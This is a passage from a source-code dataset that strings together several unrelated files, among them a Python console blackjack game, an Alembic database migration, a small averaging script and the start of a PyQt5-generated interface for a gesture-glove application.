self.player1.blackjack = False
self.player1.split = False
self.player1.double_down = False
self.player1.went_split = False
self.player1.went_double = False
self.dealer.hand = None
self.dealer.blackjack = False
self.dealer.final_hand_value = 0
def play_game(self):
"""
Main game function.
:return:
"""
self.reset()
shuffle(bj.deck.cards) # shuffle cards
# BETTING PHASE
bj.bank.make_bet()
# INITIAL CARD DEALING PHASE
bj.player1.hand = bj.deck.remove_card() # Deal cards to player and dealer
#c1 = Card(10, 1) debug option -> deal player specific cards
#c2 = Card(3, 3)
#bj.player1.hand = [c1, c2]
bj.dealer.hand = bj.deck.remove_card()
bj.player1.hand += bj.deck.remove_card()
bj.dealer.hand += bj.deck.remove_card()
# PRE PLAYER-CHOICE PHASE
player_hand_val = bj.player1.hand_value_check(bj.player1.hand) # check for natural blackjacks
dealer_hand_val = bj.dealer.hand_value_check(bj.dealer.hand)
bj.table.draw_table(1)
for i in player_hand_val:
if i == 21:
bj.player1.blackjack = True
bj.table.stage = "BJ!"
bj.table.draw_table(1)
elif i == 9 or i == 10 or i == 11: # check for double down option
bj.player1.double_down = True
if bj.player1.hand[0].value == bj.player1.hand[1].value: # check for split pair option
bj.player1.split = True
for i in dealer_hand_val:
if i == 21:
bj.dealer.blackjack = True
if bj.player1.blackjack is True: # pay for natural blackjack outcomes
bj.table.stage = "natural BJ"
bj.table.draw_table()
if bj.dealer.blackjack is False:
bj.player1.bankroll += bj.bank.player1_bet * 2.5
bj.dealer.bankroll -= bj.bank.player1_bet * 1.5
bj.table.draw_table(3)
return
else:
bj.player1.bankroll += bj.bank.player1_bet
bj.table.draw_table(3)
return
# PLAYER CHOICE PHASE
def ask_user():
"""
General function for user choice prompt. Checks for valid available player choices (hit/stand available
always, split and DD are turned by respective flags), asks user for input, keeps asking till input is valid.
:return:
"""
while True:
if bj.player1.double_down is True and bj.player1.split is True and bj.player1.went_split is False:
p_choice = input("Hit, Stand, Double Down or Split?\n")
if p_choice != "hit" and p_choice != "stand" and p_choice != "dd" and p_choice != "double" and p_choice != "double down" and p_choice != "split":
print("Wrong input.\n")
continue
else:
return p_choice
elif bj.player1.split is True and bj.player1.went_split is False: # various input prompts depending on available player choices
p_choice = input("Hit, Stand or Split?\n")
if p_choice != "hit" and p_choice != "stand" and p_choice != "split":
print("Wrong input.\n")
continue
else:
return p_choice
elif bj.player1.double_down is True:
p_choice = input("Hit, Stand or Double Down?\n")
if p_choice != "hit" and p_choice != "stand" and p_choice != "dd" and p_choice != "double" and p_choice != "double down":
print("Wrong input.\n")
continue
else:
return p_choice
else:
p_choice = input("Hit or Stand?\n")
if p_choice != "hit" and p_choice != "stand":
print("Wrong input.\n")
continue
else:
return p_choice
def double_down(hand=bj.player1.hand):
"""
Double Down function. Takes into account possible second hand if splitting choice was made. Doubles player's
bet, deals 1 card to current hand, calculates hand value and assigns it to respective final hand value.
:param hand:
:return:
"""
if hand == bj.player1.hand:
bj.player1.bankroll -= bj.bank.player1_bet
bj.bank.player1_bet += bj.bank.player1_bet
else:
bj.player1.bankroll -= bj.bank.player1_bet2
bj.bank.player1_bet2 += bj.bank.player1_bet2
if hand == bj.player1.hand:
bj.player1.hand.append(bj.deck.remove_card())
bj.player1.final_hand_val = bj.player1.hand_value_check(bj.player1.hand)
else:
bj.player1.hand2.append(bj.deck.remove_card())
bj.player1.final_hand2_val = bj.player1.hand_value_check(bj.player1.hand2)
bj.player1.went_double = True
def hit(hand=bj.player1.hand):
"""
Simply deals additional card to current hand.
:param hand:
:return:
"""
hand.append(bj.deck.remove_card())
def stand(hand=bj.player1.hand):
"""
Calculates current hand values, discards ones exceeding 21, then chooses largest of remaining values and
assigns it to player final hand value
:param hand:
:return:
"""
phv = bj.player1.hand_value_check(hand) # check player hand value
phv = [x for x in phv if x <= 21]
if hand == bj.player1.hand:
if len(phv) > 0:
bj.player1.final_hand_val = max(phv)
else:
bj.player1.final_hand_val = "bust"
else:
if len(phv) > 0:
bj.player1.final_hand2_val = max(phv)
else:
bj.player1.final_hand2_val = "bust"
def check_for_bust_or_bj(hand=bj.player1.hand):
    """
    Check *hand* for a bust or a 21. Hand values over 21 are discarded:
    with none left the hand is marked "bust"; if 21 is among the remaining
    values the final value is fixed at 21. Otherwise the hand stays live
    and the final value slot is left untouched.
    :param hand: bj.player1.hand (default) or bj.player1.hand2
    :return: None
    """
    values = [v for v in bj.player1.hand_value_check(hand) if v <= 21]
    if not values:
        result = "bust"
    elif 21 in values:
        result = 21
    else:
        return  # neither bust nor 21: keep playing this hand
    # Identity check: equal-ranked split hands would fool an `==` test
    # and mark the wrong hand as bust/blackjack.
    if hand is bj.player1.hand:
        bj.player1.final_hand_val = result
    else:
        bj.player1.final_hand2_val = result
global p_choice
p_choice = ask_user()
if p_choice == "split": # branch out hands if split was available and chosen by player
bj.player1.hand2.append(bj.player1.hand.pop()) #create second hand for player1
bj.player1.hand.append(bj.player1.hand.pop())
bj.player1.bankroll -= bj.bank.player1_bet #make a bet on a second hand
bj.bank.player1_bet2 = bj.bank.player1_bet
bj.table.stage = "split"
bj.table.draw_table(0.33)
split_aces = False
bj.player1.went_split = True
bj.player1.double_down = False # turn off possible DD flag from initial draw, check for DD again
if player_hand_val[0] / 2 == 11: # check for split-Aces corner case (deal only 1 card to each ace,
bj.player1.double_down = True # if that card is 10, pay only 1x bet, not 1.5)
split_aces = True
elif player_hand_val[0] / 2 == 9 or player_hand_val[0] / 2 == 10:
bj.player1.double_down = True
if split_aces is True: #special case for splitting aces
for i in range(0,2): #run once for each card
while True:
p_choice = input("Do you want to Double Down? yes\\no\n")
if p_choice != "yes" and p_choice != "no":
print("Wrong input.\n")
continue
else:
break
if p_choice == "yes" and i == 0: # when player chose to split aces and double down
double_down()
bj.table.draw_table(0.5)
elif p_choice == "yes" and i == 1:
double_down(bj.player1.hand2) # <------- end PCP with final_hand_value(_\2) unchecked results
bj.table.draw_table(0.5)
elif i == 0: # deal one card for first ace
hit()
bj.player1.final_hand_val = bj.player1.hand_value_check(bj.player1.hand)
bj.table.draw_table(0.5)
elif i == 1: # and one for second ace
hit(bj.player1.hand2)
bj.player1.final_hand2_val = bj.player1.hand_value_check(bj.player1.hand2) # <------- end PCP with final_hand_value(_\2) unchecked results
bj.table.draw_table(0.5)
else: # general case - 2 loops for each of 2 non-Ace split hands
for i in range(0, 2):
p_choice = ask_user()
if i == 0 and p_choice == "dd" or p_choice == "double down" or p_choice == "double":
double_down()
bj.player1.went_double = False # Turn down DD flag for possible DD on second hand
bj.table.draw_table(0.5)
elif i == 1 and p_choice == "dd" or p_choice == "double down" or p_choice == "double":
double_down(bj.player1.hand2)
bj.table.draw_table(0.5) # <------- end PCP with final_hand_value(_\2) unchecked results
else:
ask_counter = 0
while True:
if ask_counter > 0:
p_choice = ask_user()
if i == 0 and p_choice == "hit":
hit()
check_for_bust_or_bj()
if bj.player1.final_hand_val == 21 or bj.player1.final_hand_val == "bust":
bj.table.draw_table(0.5)
break
else:
ask_counter += 1
bj.table.draw_table(0.5)
continue
elif i == 0 and p_choice == "stand":
stand()
bj.table.draw_table(0.33)
break
elif i == 1 and p_choice == "hit":
hit(bj.player1.hand2)
check_for_bust_or_bj(bj.player1.hand2)
if bj.player1.final_hand2_val == 21 or bj.player1.final_hand2_val == "bust":
bj.table.draw_table(0.5)
break # <------- end PCP with final_hand_value(_\2) unchecked results
else:
ask_counter += 1
bj.table.draw_table(0.5)
continue
elif i == 1 and p_choice == "stand":
stand(bj.player1.hand2)
bj.table.draw_table(0.33)
break # <------- end PCP with final_hand_value(_\2) unchecked results
elif p_choice == "dd" or p_choice == "double" or p_choice == "double down":
double_down() # <------- end PCP with final_hand_value(_\2) unchecked results
bj.table.draw_table(0.5)
else:
counter = 0 # entering this branch with a valid p_choice
while True: # counter allows us to do it only starting from the second run of the loop
if counter > 0:
bj.player1.split = False
bj.player1.double_down = False
p_choice = ask_user()
if p_choice == "hit":
hit()
check_for_bust_or_bj()
counter += 1
if bj.player1.final_hand_val == 21 or bj.player1.final_hand_val == "bust":
bj.table.draw_table(1)
break # <------- end PCP with final_hand_value(_\2) unchecked results
else:
bj.table.draw_table(0.8)
continue
elif p_choice == "stand":
stand()
bj.table.draw_table(0.8)
break # <------- end PCP with final_hand_value(_\2) unchecked results
# normalize final hand values to single "int"s
if bj.player1.final_hand_val == "bust" and bj.player1.final_hand2_val == "bust" and bj.player1.went_split is True:
bj.dealer.bankroll += bj.bank.player1_bet
bj.dealer.bankroll += bj.bank.player1_bet2
return
elif bj.player1.went_split is False and bj.player1.final_hand_val == "bust":
bj.dealer.bankroll += bj.bank.player1_bet
return
else:
if type(bj.player1.final_hand_val) == list:
bj.player1.final_hand_val = max(bj.player1.final_hand_val)
if type(bj.player1.final_hand2_val) == list:
bj.player1.final_hand2_val = max(bj.player1.final_hand2_val)
# DEALER PHASE
bj.table.dealer_phase = True
bj.table.draw_table() # Dealer reveals face-down card
while True:
if dealer_hand_val[0] < 17: # If hand val is less than 17, dealer keeps drawing cards
bj.dealer.hand.append(bj.deck.remove_card())
dealer_hand_val = bj.dealer.hand_value_check(bj.dealer.hand)
bj.table.draw_table(0.4)
continue
else: # If hand val is 17 or more, dealer stops drawing
if dealer_hand_val[0] > 21:
bj.dealer.final_hand_value = 0 # dealer goes bust
bj.table.draw_table(1)
break
else:
bj.dealer.final_hand_value = dealer_hand_val[0]
bj.table.draw_table(1)
break
# SHOWDOWN
# Payment's for player's first hand
if bj.player1.final_hand_val == "bust":
bj.dealer.bankroll += bj.bank.player1_bet
else:
if bj.dealer.final_hand_value == bj.player1.final_hand_val:
bj.player1.bankroll += bj.bank.player1_bet
elif bj.dealer.final_hand_value > bj.player1.final_hand_val:
bj.dealer.bankroll += bj.bank.player1_bet
elif bj.dealer.final_hand_value < bj.player1.final_hand_val:
bj.dealer.bankroll -= bj.bank.player1_bet
bj.player1.bankroll += bj.bank.player1_bet * 2
# Payments for player's second hand
if bj.player1.final_hand2_val == "bust":
bj.dealer.bankroll += bj.bank.player1_bet2
else:
if bj.dealer.final_hand_value == bj.player1.final_hand2_val:
bj.player1.bankroll += bj.bank.player1_bet2
elif bj.dealer.final_hand_value > bj.player1.final_hand2_val:
bj.dealer.bankroll += bj.bank.player1_bet2
elif bj.dealer.final_hand_value < bj.player1.final_hand2_val:
bj.dealer.bankroll -= bj.bank.player1_bet2
bj.player1.bankroll += bj.bank.player1_bet2 * 2
bj.table.draw_table(0.33)
# Entry point: build one Game and keep dealing rounds forever — there is
# no exit condition in the loop, so the process runs until interrupted.
bj = Game()
while True:
    bj.play_game()
# NOTE(review): the replay prompt below is dead code kept for reference;
# as written its `answer == "y" or "Y"` test was always truthy anyway.
# while True:
#     answer = input("Play another hand? Y/N\n")
#     if answer != "Y" and answer != "y" and answer != "N" and answer != "n":
#         print("Wrong input, try again")
#     elif answer == "y" or "Y":
#         bj.play_game()
#         continue
#     else:
#         break
|
991,273 | e83a3ab4e38e89534b3ffc1e1bf95e2d17529aa1 | """initial migration
Revision ID: 55ca2c0b5330
Revises:
Create Date: 2018-12-29 20:10:44.477132
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '55ca2c0b5330'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
    """Create the ``stop`` table and a non-unique index on its ``name`` column."""
    # ### commands auto generated by Alembic - please adjust! ###
    stop_columns = (
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('last_run', sa.DateTime(), nullable=True),
        sa.Column('name', sa.String(length=200), nullable=True),
        sa.Column('matches', sa.Integer(), nullable=True),
        sa.Column('lat', sa.Float(), nullable=True),
        sa.Column('lon', sa.Float(), nullable=True),
        sa.Column('county', sa.String(), nullable=True),
        sa.Column('turbo_url', sa.String(), nullable=True),
        sa.Column('isStation', sa.Boolean(), nullable=True),
        sa.Column('exception', sa.String(), nullable=True),
        sa.Column('names_in_osm', sa.String(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
    )
    op.create_table('stop', *stop_columns)
    op.create_index(op.f('ix_stop_name'), 'stop', ['name'], unique=False)
    # ### end Alembic commands ###
def downgrade():
    """Reverse of upgrade(): drop the ``name`` index, then the ``stop`` table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_index(op.f('ix_stop_name'), table_name='stop')
    op.drop_table('stop')
    # ### end Alembic commands ###
|
def average(x, y, z):
    """Return the arithmetic mean of three marks as a string with two decimals."""
    mean = (x + y + z) / 3
    return format(mean, ".2f")
if __name__ == '__main__':
    # Read N lines of "name score score score", then print the mean of
    # the three scores for the queried student.
    n = int(input())
    student_marks = {}
    for _ in range(n):
        name, *raw_scores = input().split()
        student_marks[name] = [float(s) for s in raw_scores]
    query_name = input()
    marks = student_marks[query_name]
    print(average(marks[0], marks[1], marks[2]))
|
991,275 | d713ad01f97b3c00cf7d82c709965124140b67ee | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'HandsOn_GUI_Layout.ui'
#
# Created by: PyQt5 UI code generator 5.5.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1280, 960)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("HandsOn_Capstone/Glove_Layout_1.PNG"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(MainWindow)
font = QtGui.QFont()
font.setPointSize(9)
self.centralwidget.setFont(font)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName("verticalLayout")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.tabWidget.setFont(font)
self.tabWidget.setObjectName("tabWidget")
self.captureTab = QtWidgets.QWidget()
self.captureTab.setObjectName("captureTab")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.captureTab)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.horizontalLayout_capFile = QtWidgets.QHBoxLayout()
self.horizontalLayout_capFile.setObjectName("horizontalLayout_capFile")
self.labelFile = QtWidgets.QLabel(self.captureTab)
self.labelFile.setObjectName("labelFile")
self.horizontalLayout_capFile.addWidget(self.labelFile)
self.lineEditFileOut = QtWidgets.QLineEdit(self.captureTab)
self.lineEditFileOut.setObjectName("lineEditFileOut")
self.horizontalLayout_capFile.addWidget(self.lineEditFileOut)
self.btnFileOut = QtWidgets.QPushButton(self.captureTab)
self.btnFileOut.setObjectName("btnFileOut")
self.horizontalLayout_capFile.addWidget(self.btnFileOut)
self.verticalLayout_3.addLayout(self.horizontalLayout_capFile)
self.line = QtWidgets.QFrame(self.captureTab)
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.verticalLayout_3.addWidget(self.line)
self.labelOutFileViewer = QtWidgets.QLabel(self.captureTab)
self.labelOutFileViewer.setObjectName("labelOutFileViewer")
self.verticalLayout_3.addWidget(self.labelOutFileViewer)
self.plainTextEditFileOut = QtWidgets.QPlainTextEdit(self.captureTab)
self.plainTextEditFileOut.setObjectName("plainTextEditFileOut")
self.verticalLayout_3.addWidget(self.plainTextEditFileOut)
self.horizontalLayout_gestCap = QtWidgets.QHBoxLayout()
self.horizontalLayout_gestCap.setObjectName("horizontalLayout_gestCap")
self.labelGestCap = QtWidgets.QLabel(self.captureTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.labelGestCap.setFont(font)
self.labelGestCap.setObjectName("labelGestCap")
self.horizontalLayout_gestCap.addWidget(self.labelGestCap)
self.lineEditGestCap = QtWidgets.QLineEdit(self.captureTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.lineEditGestCap.setFont(font)
self.lineEditGestCap.setObjectName("lineEditGestCap")
self.horizontalLayout_gestCap.addWidget(self.lineEditGestCap)
self.btnGestCap = QtWidgets.QPushButton(self.captureTab)
self.btnGestCap.setEnabled(True)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnGestCap.setFont(font)
self.btnGestCap.setCheckable(False)
self.btnGestCap.setDefault(False)
self.btnGestCap.setObjectName("btnGestCap")
self.horizontalLayout_gestCap.addWidget(self.btnGestCap)
self.verticalLayout_3.addLayout(self.horizontalLayout_gestCap)
self.tabWidget.addTab(self.captureTab, "")
self.trainTab = QtWidgets.QWidget()
self.trainTab.setObjectName("trainTab")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.trainTab)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.horizontalLayout_trainFile = QtWidgets.QHBoxLayout()
self.horizontalLayout_trainFile.setObjectName("horizontalLayout_trainFile")
self.labelTrainFile = QtWidgets.QLabel(self.trainTab)
self.labelTrainFile.setObjectName("labelTrainFile")
self.horizontalLayout_trainFile.addWidget(self.labelTrainFile)
self.lineEditTrainFile = QtWidgets.QLineEdit(self.trainTab)
self.lineEditTrainFile.setObjectName("lineEditTrainFile")
self.horizontalLayout_trainFile.addWidget(self.lineEditTrainFile)
self.btnTrainFile = QtWidgets.QPushButton(self.trainTab)
self.btnTrainFile.setObjectName("btnTrainFile")
self.horizontalLayout_trainFile.addWidget(self.btnTrainFile)
self.verticalLayout_4.addLayout(self.horizontalLayout_trainFile)
self.line_2 = QtWidgets.QFrame(self.trainTab)
self.line_2.setFrameShape(QtWidgets.QFrame.HLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.verticalLayout_4.addWidget(self.line_2)
self.labelTrainFileViewer = QtWidgets.QLabel(self.trainTab)
self.labelTrainFileViewer.setObjectName("labelTrainFileViewer")
self.verticalLayout_4.addWidget(self.labelTrainFileViewer)
self.plainTextEditTrainFile = QtWidgets.QPlainTextEdit(self.trainTab)
self.plainTextEditTrainFile.setObjectName("plainTextEditTrainFile")
self.verticalLayout_4.addWidget(self.plainTextEditTrainFile)
self.horizontalLayout_train = QtWidgets.QHBoxLayout()
self.horizontalLayout_train.setObjectName("horizontalLayout_train")
self.labelTrainStatus = QtWidgets.QLabel(self.trainTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.labelTrainStatus.setFont(font)
self.labelTrainStatus.setObjectName("labelTrainStatus")
self.horizontalLayout_train.addWidget(self.labelTrainStatus)
self.lineEditTrainStatus = QtWidgets.QLineEdit(self.trainTab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEditTrainStatus.sizePolicy().hasHeightForWidth())
self.lineEditTrainStatus.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.lineEditTrainStatus.setFont(font)
self.lineEditTrainStatus.setReadOnly(True)
self.lineEditTrainStatus.setObjectName("lineEditTrainStatus")
self.horizontalLayout_train.addWidget(self.lineEditTrainStatus)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_train.addItem(spacerItem)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_train.addItem(spacerItem1)
self.btnTrainClassifier = QtWidgets.QPushButton(self.trainTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnTrainClassifier.setFont(font)
self.btnTrainClassifier.setObjectName("btnTrainClassifier")
self.horizontalLayout_train.addWidget(self.btnTrainClassifier)
self.verticalLayout_4.addLayout(self.horizontalLayout_train)
self.tabWidget.addTab(self.trainTab, "")
self.classifyRealTab = QtWidgets.QWidget()
self.classifyRealTab.setObjectName("classifyRealTab")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.classifyRealTab)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.verticalLayout_ClassRT = QtWidgets.QVBoxLayout()
self.verticalLayout_ClassRT.setObjectName("verticalLayout_ClassRT")
self.checkBoxTtoS = QtWidgets.QCheckBox(self.classifyRealTab)
self.checkBoxTtoS.setChecked(True)
self.checkBoxTtoS.setObjectName("checkBoxTtoS")
self.verticalLayout_ClassRT.addWidget(self.checkBoxTtoS)
self.checkBoxClassRTdebug = QtWidgets.QCheckBox(self.classifyRealTab)
self.checkBoxClassRTdebug.setChecked(False)
self.checkBoxClassRTdebug.setObjectName("checkBoxClassRTdebug")
self.verticalLayout_ClassRT.addWidget(self.checkBoxClassRTdebug)
self.horizontalLayout_ClassRtDelay = QtWidgets.QHBoxLayout()
self.horizontalLayout_ClassRtDelay.setObjectName("horizontalLayout_ClassRtDelay")
self.labelClassRtDelay = QtWidgets.QLabel(self.classifyRealTab)
self.labelClassRtDelay.setObjectName("labelClassRtDelay")
self.horizontalLayout_ClassRtDelay.addWidget(self.labelClassRtDelay)
self.lineEditClassRtDelay = QtWidgets.QLineEdit(self.classifyRealTab)
self.lineEditClassRtDelay.setObjectName("lineEditClassRtDelay")
self.horizontalLayout_ClassRtDelay.addWidget(self.lineEditClassRtDelay)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_ClassRtDelay.addItem(spacerItem2)
self.verticalLayout_ClassRT.addLayout(self.horizontalLayout_ClassRtDelay)
spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_ClassRT.addItem(spacerItem3)
self.horizontalLayout_ClassRT = QtWidgets.QHBoxLayout()
self.horizontalLayout_ClassRT.setObjectName("horizontalLayout_ClassRT")
self.labelClassRT = QtWidgets.QLabel(self.classifyRealTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.labelClassRT.setFont(font)
self.labelClassRT.setObjectName("labelClassRT")
self.horizontalLayout_ClassRT.addWidget(self.labelClassRT)
self.btnClassifyStop = QtWidgets.QPushButton(self.classifyRealTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnClassifyStop.setFont(font)
self.btnClassifyStop.setObjectName("btnClassifyStop")
self.horizontalLayout_ClassRT.addWidget(self.btnClassifyStop)
self.btnClassifyStart = QtWidgets.QPushButton(self.classifyRealTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnClassifyStart.setFont(font)
self.btnClassifyStart.setObjectName("btnClassifyStart")
self.horizontalLayout_ClassRT.addWidget(self.btnClassifyStart)
self.verticalLayout_ClassRT.addLayout(self.horizontalLayout_ClassRT)
self.horizontalLayout_4.addLayout(self.verticalLayout_ClassRT)
self.plainTextEditClassRT = QtWidgets.QPlainTextEdit(self.classifyRealTab)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(True)
font.setWeight(75)
self.plainTextEditClassRT.setFont(font)
self.plainTextEditClassRT.setReadOnly(True)
self.plainTextEditClassRT.setObjectName("plainTextEditClassRT")
self.horizontalLayout_4.addWidget(self.plainTextEditClassRT)
self.plainTextEditClassRT.raise_()
self.tabWidget.addTab(self.classifyRealTab, "")
self.verticalLayout.addWidget(self.tabWidget)
self.line_3 = QtWidgets.QFrame(self.centralwidget)
self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.verticalLayout.addWidget(self.line_3)
self.horizontalLayout_dataOut = QtWidgets.QHBoxLayout()
self.horizontalLayout_dataOut.setObjectName("horizontalLayout_dataOut")
self.gBoxFlex = QtWidgets.QGroupBox(self.centralwidget)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.gBoxFlex.setFont(font)
self.gBoxFlex.setObjectName("gBoxFlex")
self.formLayout = QtWidgets.QFormLayout(self.gBoxFlex)
self.formLayout.setObjectName("formLayout")
self.indexLabel = QtWidgets.QLabel(self.gBoxFlex)
self.indexLabel.setObjectName("indexLabel")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.indexLabel)
self.indexLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.indexLineEdit.setFont(font)
self.indexLineEdit.setReadOnly(True)
self.indexLineEdit.setObjectName("indexLineEdit")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.indexLineEdit)
self.indexKnuckleLabel = QtWidgets.QLabel(self.gBoxFlex)
self.indexKnuckleLabel.setObjectName("indexKnuckleLabel")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.indexKnuckleLabel)
self.indexKnuckleLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.indexKnuckleLineEdit.setFont(font)
self.indexKnuckleLineEdit.setReadOnly(True)
self.indexKnuckleLineEdit.setObjectName("indexKnuckleLineEdit")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.indexKnuckleLineEdit)
self.middleLabel = QtWidgets.QLabel(self.gBoxFlex)
self.middleLabel.setObjectName("middleLabel")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.middleLabel)
self.middleLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.middleLineEdit.setFont(font)
self.middleLineEdit.setReadOnly(True)
self.middleLineEdit.setObjectName("middleLineEdit")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.middleLineEdit)
self.middleKnuckleLabel = QtWidgets.QLabel(self.gBoxFlex)
self.middleKnuckleLabel.setObjectName("middleKnuckleLabel")
self.formLayout.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.middleKnuckleLabel)
self.middleKnuckleLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.middleKnuckleLineEdit.setFont(font)
self.middleKnuckleLineEdit.setReadOnly(True)
self.middleKnuckleLineEdit.setObjectName("middleKnuckleLineEdit")
self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.middleKnuckleLineEdit)
self.ringLabel = QtWidgets.QLabel(self.gBoxFlex)
self.ringLabel.setObjectName("ringLabel")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.ringLabel)
self.ringLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.ringLineEdit.setFont(font)
self.ringLineEdit.setReadOnly(True)
self.ringLineEdit.setObjectName("ringLineEdit")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.ringLineEdit)
self.ringKnuckleLabel = QtWidgets.QLabel(self.gBoxFlex)
self.ringKnuckleLabel.setObjectName("ringKnuckleLabel")
self.formLayout.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.ringKnuckleLabel)
self.ringKnuckleLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.ringKnuckleLineEdit.setFont(font)
self.ringKnuckleLineEdit.setReadOnly(True)
self.ringKnuckleLineEdit.setObjectName("ringKnuckleLineEdit")
self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.ringKnuckleLineEdit)
self.pinkyLabel = QtWidgets.QLabel(self.gBoxFlex)
self.pinkyLabel.setObjectName("pinkyLabel")
self.formLayout.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.pinkyLabel)
self.pinkyLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.pinkyLineEdit.setFont(font)
self.pinkyLineEdit.setReadOnly(True)
self.pinkyLineEdit.setObjectName("pinkyLineEdit")
self.formLayout.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.pinkyLineEdit)
self.thumbLabel = QtWidgets.QLabel(self.gBoxFlex)
self.thumbLabel.setObjectName("thumbLabel")
self.formLayout.setWidget(7, QtWidgets.QFormLayout.LabelRole, self.thumbLabel)
self.thumbLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.thumbLineEdit.setFont(font)
self.thumbLineEdit.setReadOnly(True)
self.thumbLineEdit.setObjectName("thumbLineEdit")
self.formLayout.setWidget(7, QtWidgets.QFormLayout.FieldRole, self.thumbLineEdit)
self.thumbKnuckeLabel = QtWidgets.QLabel(self.gBoxFlex)
self.thumbKnuckeLabel.setObjectName("thumbKnuckeLabel")
self.formLayout.setWidget(8, QtWidgets.QFormLayout.LabelRole, self.thumbKnuckeLabel)
self.thumbKnuckeLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.thumbKnuckeLineEdit.setFont(font)
self.thumbKnuckeLineEdit.setReadOnly(True)
self.thumbKnuckeLineEdit.setObjectName("thumbKnuckeLineEdit")
self.formLayout.setWidget(8, QtWidgets.QFormLayout.FieldRole, self.thumbKnuckeLineEdit)
self.horizontalLayout_dataOut.addWidget(self.gBoxFlex)
self.gBoxTouch = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxTouch.setObjectName("gBoxTouch")
self.formLayout_2 = QtWidgets.QFormLayout(self.gBoxTouch)
self.formLayout_2.setObjectName("formLayout_2")
self.indexSideLabel = QtWidgets.QLabel(self.gBoxTouch)
